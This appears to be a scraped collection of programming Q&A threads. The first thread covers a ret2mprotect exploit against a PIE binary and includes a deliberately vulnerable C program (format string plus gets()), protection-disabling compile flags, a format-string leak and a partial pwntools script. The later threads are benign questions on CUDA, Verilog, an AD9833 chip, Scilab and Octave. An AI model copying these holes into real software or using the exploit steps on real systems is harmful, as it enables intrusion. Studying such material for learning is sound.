How to calculate start address of the stack of a pie binary on a system with full ASLR enabled? - binary

I have a pie binary(ELF) with nx and pie bit enabled on a System with Full ASLR enabled.
I have problem for finding out the stack's base address. I want to ret2mprotect and then ret2shellcode on the stack,
but my exploit doesn't work because offset we use to calcuate stack's base address changes on every run of binary.
Could you please help me to solve the problem?
Here is my vulnerable code:
#include <stdio.h>
int main(int argc,char* argv[]) {
char buffer[256];
printf(argv[1]);
printf("\n");
gets(buffer);
return 0;
}
my compile command:
gcc -Wall -g -O0 -Wl,-rpath,./ -fcf-protection=none -fno-stack-protector -fpic vuln.c -o vuln
I got required leaked from this format-string(below value passed to the program):
%1$p:%41$p
1st leak address is in range of stack.
41th leak address is in range of libc library.
I got this sample values to determine offset based on it: (ex means example)
exStackStart = 0x7ffee8986000
exStackEnd = 0x7ffee89a8000
exLibcStart = 0x7fea59ec5000
exLibcEnd = 0x7fea5a03d000
exGetsBuffer = 0x7ffee89a5d50
exStackLeaked = 0x7ffee89a5f48
exLibcLeaked = 0x7fea59ec7083
offsetStackLeaked2StackEnd = exStackEnd - exStackLeaked
offsetStackLeaked2GetsBuffer = exStackLeaked - exGetsBuffer
offsetLibcLeaked2LibcStart = exLibcLeaked - exLibcStart
stackSize = exStackEnd - exStackStart
io = start()
output = str(io.recvuntil(b'\n')).split(':')
runStackLeaked = int(output[0][2:], 16)
runLibcLeaked = int(output[1][:-3], 16)
runStackEnd = runStackLeaked + offsetStackLeaked2StackEnd
runStackStartRaw = runStackEnd - stackSize
runStackStart = runStackStartRaw & (~4095) <====== here is the problem! sometimes this is correct and sometimes this is 0x1000 or 0x2000 far from correct address
runGetsBuffer = runStackLeaked - offsetStackLeaked2GetsBuffer
runLibcStart = runLibcLeaked - offsetLibcLeaked2LibcStart
io.send(b'A' * 300 + b'\n')
io.interactive()
Update:
The vuln​ gives me a address which is in range of the stack(I've check using vmmap​ command in gdb​) using format string vulnerablitiy.
Full ASLR on my OS is enabled, so address of stack for my binary vary on each run of the binary, so I would like to achieve an offset that I can add/substract to/from leaked address and get to start of the stack(which vmmap​ show me).
I have checked the distance between the leaked address and start of the stack and take note it somewhere, so I want to automatically calculate start address of the stack just by adding/substracting the offset to/from the leaked address without manually check in gdb​.
but unfortunately the offset differs on every run of the binary, so the offset we achieved is not valid.
offset from leaked address to stack's start-address(got from gdb vmmap​):
(following numbers is in decimal)
run1: 127480
run2: 128584
run3: 130632
run4: 126008
run5: 127656
As you can see, the distance between the offset and start of the stack differs on each run.
What cause the problem and how to defeat(achieve/calulcate) it?
following two pictures are for two run of the program, but result is not like we expected.
result of run1
result of run2
I expected the offset from start of the stack to any location in the stack is fixed but it vary for my binary each time, and As far as I know ASLR only affects base address of memory regions(like stack, heap, ...) and offset between the variable inside one memory area must be fixed.

The offset from the buffer to the start of the stack frame is indeed fixed. The offset from the buffer to the start of the stack is not consistent.

Related

(cudaBindTexture2D) How to bind a pitched-array from the middle

I am trying to bind a pitched array from the middle partly (not from the beginning of the array), like followings.
/1. allocate/
cudaMallocPitch((void**)&d_texinput, &FloatPitch, cols*sizeof(float), rows);
cudaMallocPitch((void**)&d_output, &FloatPitch, cols*sizeof(float), rows);
/2. set row-length of target region (i.e., dividing rows 10 times)/
int row_div_times = 10;
int part_rows = rows / row_div_times;
int part_offset = part_rows*FloatPitch/sizeof(float);
dim3 threads(16,16);
dim3 Part_Blocks((cols + threads.x - 1) / threads.x, (Part_rows + threads.y - 1) / threads.y);
/3. processing divided rows, iteratively/
for (int i = 0; i < row_div_times; i++)
{
size_t offsetsize= i*part_offset;
/*computing values of "d_tex_input"*/
calibration << <Part_Blocks, threads, 0, stream[i] >> >
(d_texinput + i*part_offset );
/*
//###(QUESTION point!) I want to bind the device memory "d_texinput" to texture "tex_mem" only partly like below.
cudaBindTexture2D(0, tex_mem, &d_texinput[i*part_offset], channelDesc_flt, cols, Part_rows, FloatPitch); //tentative code a;
,,, or something like,,,
cudaBindTexture2D(&offsetsize, tex_mem, &d_texinput, channelDesc_flt, cols, Part_rows, FloatPitch); //tentative code b;
*/
//final computaion with texture
final_computationwithtexture << <Part_Blocks, threads, 0, stream[i] >> >
( d_output + i*part_offset );
cudaUnbindTexture(tex_mem);
}
Please kindly allow me to ask your instruction, advice how to bind the target region of the device memory array partly by revising above( QUESTION point!)?
I tried to understand first argument of cudaBindTExture2D as "offset". but it is not value. it is address. according to the documentation.
i still could not understand the documentation.
I hope I can understand what that is by knowing adequate inputting way to the cudaBindTexture2D.
The offset parameter is not an input, it is an output. That's why it is a pointer. The function will set the offset in bytes. If you want to bind in the middle of an allocation, you set the devPtr argument (third) appropriately and then the function will give you the offset required for texture accesses.
Here is how to understand this: Textures can only be bound with a certain alignment. Memory allocations are always properly aligned. Therefore it is not an issue in most cases. However, if you provide an arbitrary memory address, CUDA has to round down to the alignment and you have to apply the proper offset later on.
Let's say you bind &float[66], the proper alignment might be &float[64], so CUDA starts its texture at that offset and you have to add an offset of 8 bytes for each access to get the desired result. I'm picking random numbers here, I don't know the alignment requirements.

Why are my Verilog output registers only outputting "x"?

I've written the following module to take in a 12-bit stream of input, and run it through the Exponential Moving Average (EMA) formula. When simulating the program, it appears as if my output is a 12-bit stream of "don't cares". Regardless of what my input is, it isn't realized by the output register.
I'm a beginner at Verilog, so I'm sure there are a slew of issues here, but I expected to at least get some kind of output. Why is this behavior occurring and how can I fix it from occurring in the future? I've linked a screenshot of my waveform results at the bottom of this post.
My verilog module:
`timescale 1ns / 1ps
module EMATesting ( input signed [11:0] signal_in,
output reg signed [11:0] signal_out,
input clock_in,
input reset,
input enable,
output reg [11:0] newEMA);
reg [11:0] prevEMA;
reg [11:0] y;
reg [11:0] temp;
integer count = 0;
integer t = 1;
integer one = 1;
integer alpha = 0.5;
always #(posedge clock_in) begin
if (reset) begin
count = 0;
end
else if (count < 64) begin
count = count + 1;
end
//set the output equal to the first value received
if (count == 1) begin
newEMA = signal_in;
end
//if not the first value, run through the formula
else begin
temp = newEMA;
prevEMA = temp;
newEMA = alpha * signal_in + (one-alpha) * prevEMA;
count = count + 1;
end
end
endmodule
My verilog testbench:
`timescale 10ns / 1ns
module testbench_EMA;
reg signal_in;
reg clock_in, reset, enable;
wire [11:0] signal_out;
wire [11:0] newEMA;
initial begin
signal_in = 0; reset = 0; enable = 0;
clock_in = 0;
end
EMATesting DUT(signal_in, signal_out, clock_in, reset, enable, newEMA);
initial
begin
//test some values with timing intervals here
#100;
reset = 1;
#100;
reset = 0;
enable = 1;
#100;
//set signal_in to "1" repeating 12 times
signal_in = { 12 { 1'b1}};
#100;
reset = 1;
#100; //buffer to end simulation
$finish;
end
always
#5 clock_in = !clock_in;
endmodule
Waveform results of my testbench. Note that both output registers are giving no values.
There are many mistakes in your code. #Mr. Snrub listed some of them. You can correct the mistakes that are listed in the comments, and by further editing your code you can make it work as you wish, but there are more important fundamental problems. You have to solve them before you make further and hard to debug mistakes in the future, it also gives advantage of understanding HDL concepts better.
First of all, you need to understand the difference between software programming languages and hardware description languages. You should make further research for that, the mistakes you made are commonly made by developers who assume HDL is similar to software programming languages. Check this link for further information.
You need to further understand how the Verilog HDL (or any other HDL) codes are synthesized and why they are used.
Need to be familiar when and how to use blocking = or non-blocking <= assignments and how they work. Check this link.
When you research about the listed topics, you will understand that in edge sensitive (synchronous or sequential) always block, it is bad idea to use blocking = assignment.
When you use blocking assignment, the assignments are done in series, as in common software programming languages. In the case of edge sensitive always block, you have very limited time to finish all required assignments inside the always block.
In your case, as all the assignments inside the edge sensitive always block are blocking (assuming no reset condition):
First, it checks if count is less than 64, and completes the assignment if that is the case. All other assignments are waiting for that assignment to finish.
By the time the first assignment is done, the always block with posedge clock_in sensitivity might have ended execution and waiting for the next edge of the clock. So, other assignments are not done.
As you have not initialized your output registers, they initially were filled with 'don't cares' and new value is never assigned again, so, as a result, you got that output (filled with 'don't cares').
Even when count becomes larger than or equal to 64, you have other blocking assignments before you assign value to newEMA.

AD9833 Frequency Control Using STM32F030F4P6

I'm using STM32F030F4P6 and Stm32Cube to run AD9833 Signal Generator.
i can generate signals.but can't change the frequency.in the Analog Devices App note there is Example:
Given this example i write a code like this :
void AD9833_SetFRQ(float FRQ) {
uint32_t freq=0;
uint32_t freq0=0;
uint32_t freq1=0;
freq=(int)(((FRQ*pow(2,28))/FMCLK)+1); // Tuning Word
freq0=(freq&0x3fff)|(1<<14); // FREQ LSB
freq1=(freq>>14)|(1<<14); // FREQ MSB
AD9833_Reset();
HAL_GPIO_WritePin(GPIOB,GPIO_PIN_1,GPIO_PIN_RESET);
HAL_SPI_Transmit(&hspi1,(uint8_t*)&(freq0),1,10);
HAL_GPIO_WritePin(GPIOB,GPIO_PIN_1,GPIO_PIN_SET);
HAL_GPIO_WritePin(GPIOB,GPIO_PIN_1,GPIO_PIN_RESET);
HAL_SPI_Transmit(&hspi1,(uint8_t*)&(freq1),1,10);
HAL_GPIO_WritePin(GPIOB,GPIO_PIN_1,GPIO_PIN_SET);
HAL_GPIO_WritePin(GPIOB,GPIO_PIN_1,GPIO_PIN_RESET);
HAL_SPI_Transmit(&hspi1,(uint8_t*)&(A1),1,10);
HAL_GPIO_WritePin(GPIOB,GPIO_PIN_1,GPIO_PIN_SET);
AD9833_Set();
}
and my data output is exactly like the analog devices example as you can see in logic analyzer image :
Still no chance to change the Frequency.:(
what is the problem?
Did you ensure control bits (e.g. DB13 resp. DB14 DB15) are written correctly?
Also, at the end, reset toggle?
Check Command sequence explained section of
https://www.analog.com/media/en/technical-documentation/application-notes/AN-1070.pdf

How to solve a second order differential equation on Scilab?

I need to solve this differential equation using Runge-Kytta 4(5) on Scilab:
The initial conditions are above. The interval and the h-step are:
I don't need to implement Runge-Kutta. I just need to solve this and plot the result on the plane:
I tried to follow these instructions on the official "Scilab Help":
https://x-engineer.org/graduate-engineering/programming-languages/scilab/solve-second-order-ordinary-differential-equation-ode-scilab/
The suggested code is:
// Import the diagram and set the ending time
loadScicos();
loadXcosLibs();
importXcosDiagram("SCI/modules/xcos/examples/solvers/ODE_Example.zcos");
scs_m.props.tf = 5000;
// Select the solver Runge-Kutta and set the precision
scs_m.props.tol(6) = 6;
scs_m.props.tol(7) = 10^-2;
// Start the timer, launch the simulation and display time
tic();
try xcos_simulate(scs_m, 4); catch disp(lasterror()); end
t = toc();
disp(t, "Time for Runge-Kutta:");
However, it is not clear for me how I can change this for the specific differential equation that I showed above. I have a very basic knowledge of Scilab.
The final plot should be something like the picture bellow, an ellipse:
Just to provide some mathematical context, this is the differential equation that describes the pendulum problem.
Could someone help me, please?
=========
UPDATE
Based on #luizpauloml comments, I am updating this post.
I need to convert the second-order ODE into a system of first-order ODEs and then I need to write a function to represent such system.
So, I know how to do this on pen and paper. Hence, using z as a variable:
OK, but how do I write a normal script?
The Xcos is quite disposable. I only kept it because I was trying to mimic the example on the official Scilab page.
To solve this, you need to use ode(), which can employ many methods, Runge-Kutta included. First, you need to define a function to represent the system of ODEs, and Step 1 in the link you provided shows you what to do:
function z = f(t,y)
//f(t,z) represents the sysmte of ODEs:
// -the first argument should always be the independe variable
// -the second argument should always be the dependent variables
// -it may have more than two arguments
// -y is a vector 2x1: y(1) = theta, y(2) = theta'
// -z is a vector 2x1: z(1) = z , z(2) = z'
z(1) = y(2) //first equation: z = theta'
z(2) = 10*sin(y(1)) //second equation: z' = 10*sin(theta)
endfunction
Notice that even if t (the independent variable) does not explicitly appear in your system of ODEs, it still needs to be an argument of f(). Now you just use ode(), setting the flag 'rk' or 'rkf' to use either one of the available Runge-Kutta methods:
ts = linspace(0,3,200);
theta0 = %pi/4;
dtheta0 = 0;
y0 = [theta0; dtheta0];
t0 = 0;
thetas = ode('rk',y0, t0, ts, f); //the output have the same order
//as the argument `y` of f()
scf(1); clf();
plot2d(thetas(2,:),thetas(1,:),-5);
xtitle('Phase portrait', 'theta''(t)','theta(t)');
xgrid();
The output:

Composite trapezoid rule not running in Octave

I have the following code in Octave for implementing the composite trapezoid rule and for some reason the function only stalls whenever I execute it in Octave on f = #(x) x^2, a = 0, b = 4, TOL = 10^-6. Whenever I call trapezoid(f, a, b, TOL), nothing happens and I have to exit the Terminal in order to do anything else in Octave. Here is the code:
% INPUTS
%
% f : a function
% a : starting point
% b : endpoint
% TOL : tolerance
function root = trapezoid(f, a, b, TOL)
disp('test');
max_iterations = 10000;
disp(max_iterations);
count = 1;
disp(count);
initial = (b-a)*(f(b) + f(a))/2;
while count < max_iterations
disp(initial);
trap_0 = initial;
trap_1 = 0;
trap_1_midpoints = a:(0.5^count):b;
for i = 1:(length(trap_1_midpoints)-1)
trap_1 = trap_1 + (trap_1_midpoints(i+1) - trap_1_midpoints(i))*(f(trap_1_midpoints(i+1) + f(trap_1_midpoints(i))))/2;
endfor
if abs(trap_0 - trap_1) < TOL
root = trap_1;
return;
endif
intial = trap_1;
count = count + 1;
disp(count);
endwhile
disp(['Process ended after ' num2str(max_iterations), ' iterations.']);
I have tried your function in Matlab.
Your code is not stalling. It is rather that the size of trap_1_midpoints increases exponentionaly. With that the computation time of trap_1 increases also exponentionaly. This is what you experience as stalling.
I also found a possible bug in your code. I guess the line after the if clause should be initial = trap_1. Check the missing 'i'.
With that, your code still takes forever, but if you increase the tolerance (e.g. to a value of 1) your code return.
You could try to vectorize the for loop for speed up.
Edit: I think inside your for loop, a ) is missing after f(trap_1_midpoints(i+1).
After count=52 or so, the arithmetic sequence trap_1_midpoints is no longer representable in any meaningful fashion in floating point numbers. After count=1075 or similar, the step size is no longer representable as a positive floating point double number. That all is to say, the bound max_iterations = 10000 is ludicrous. As explained below, all computations after count=20 are meaningless.
The theoretical error for stepsize h is O(T·h^2). There is a numerical error accumulation in the summation of O(T/h) numbers that is of that size, i.e., O(mu/h) with mu=1ulp=2^(-52). Which in total means that the lowest error of the numerical integration can be expected around h=mu^(1/3), for double numbers thus h=1e-5 or in the algorithm count=17. This may vary with interval length and how smooth or wavy the function is.
One can expect the behavior that the error divides by four while halving the step size only for step sizes above this boundary 1e-5. This also means that abs(trap_0 - trap_1) is a reliable measure for the error of trap_0 (and abs(trap_0 - trap_1)/3 for trap_1) only inside this range of step sizes.
The error bound TOL=1e-6 should be met for about h=1e-3, which corresponds to count=10. If the recursion does not stop for count = 14 (which should give an error smaller than 1e-8) then the method is not accurately implemented.